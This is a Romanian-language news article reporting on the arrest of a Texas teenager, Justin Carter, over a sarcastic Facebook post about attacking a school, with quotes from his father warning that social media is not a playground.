Un adolescent în vârst? de 18 ani din Texas a fost arestat ?i risc? opt ani de închisoare, din cauza unui mesaj postat în glum? pe pagina sa de Facebook, scrie Daily Mail. Dup? ce a avut o disput? cu un prieten cu care juca un joc online, Justin Carter a scris a comentat pe Internet: „Voi merge într-o ?coal? plin? de copii ?i îi voi împu?ca pe to?i, apoi le voi mânca inimile care înc? bat”. De?i la finalul mesajului tân?rul a ar?tat c? este doar sarcastic, o femeie din Canada l-a raportat imediat Poli?iei, mai ales c? totul se petrecea la doar câteva luni de la atacul armat comis la o ?coal? din Sandy Hook. Atunci 20 de copii au fost uci?i. Justin a fost arestat în februarie ?i, în ciuda eforturilor p?rin?ilor, se afl? înc? în spatele gratiilor. „Oamenii ace?tia sunt serio?i. Chiar vor s?-mi bage fiul la închisoare pentru un comentariu sarcastic pe care l-a f?cut”, a comentat Jack, tat?l adolescentului. „Justin era tipul de copil care nu citea ziarele. Nu se uita la televizor. Nu era la curent cu evenimentele recente. Copiii ace?tia nu î?i dau seama ce fac. Ei nu în?eleg implica?iile. Nu ?tiu ce înseamn? spa?iul public”, a ad?ugat el. Mai mult, b?rbatul încearc? acum s? trag? un semnal de alarm? vizavi de cazurile de acest fel ?i s?-i înve?e pe tineri s? fie responsabili chiar ?i în mediul online: "Re?elele de socializare nu sunt un loc de joac?. Tot ce spui acolo poate fi folosit împotriva ta", a subliniat Jack. Potrivit sursei citate, Justin Carter este acuzat acum de amenin??ri teroriste ?i va fi adus în fa?a unei instan?e de judecat? pe 1 iulie. Pân? atunci, b?iatul r?mâne în arestul Poli?iei. Sursa: VIDEO.Un adolescent din SUA risc? s? stea opt ani la închisoare din cauza unei post?ri pe Facebook - Gandul